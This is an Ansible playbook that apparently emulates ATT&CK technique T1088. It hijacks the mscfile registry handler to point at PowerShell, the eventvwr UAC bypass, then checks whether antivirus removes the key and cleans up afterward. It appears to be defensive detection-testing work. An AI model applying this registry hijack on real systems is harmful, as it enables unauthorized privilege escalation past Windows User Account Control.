# attack_technique: T1088
- name: T1088 - Bypass User Account Control
  hosts: windows
  vars_files:
   - /opt/ansible/vars.yaml
  tasks:
          - name: Attaches powershell to eventviewer
            tags: always
            #reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /f
            win_regedit:
              path: HKCU:\software\classes\mscfile\shell\open\command
              data: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
              type: string
          - name: sleep for 10 seconds and continue with play to check if AV removed or Not
            tags: always
            wait_for: timeout=10
            delegate_to: localhost
          - name: Check REG exist
            tags: always
            win_command: reg.exe query hkcu\software\classes\mscfile\shell\open\command
            register: T1088
          - name: check if playbook was successfull
            tags: always
            debug: msg="Playbook Completed:T1088:passed:win:"
            when: '"powershell.exe" in T1088.stdout' 
          - name: check if playbook was failed
            tags: always
            debug: msg="Playbook Completed:T1088:failed:win:"
            when: '"powershell.exe" not in T1088.stdout'
          - name: cleanup      
            tags: always
            win_command: reg.exe delete hkcu\software\classes\mscfile\shell\open\command /ve
            when: '"powershell.exe" in T1088.stdout'
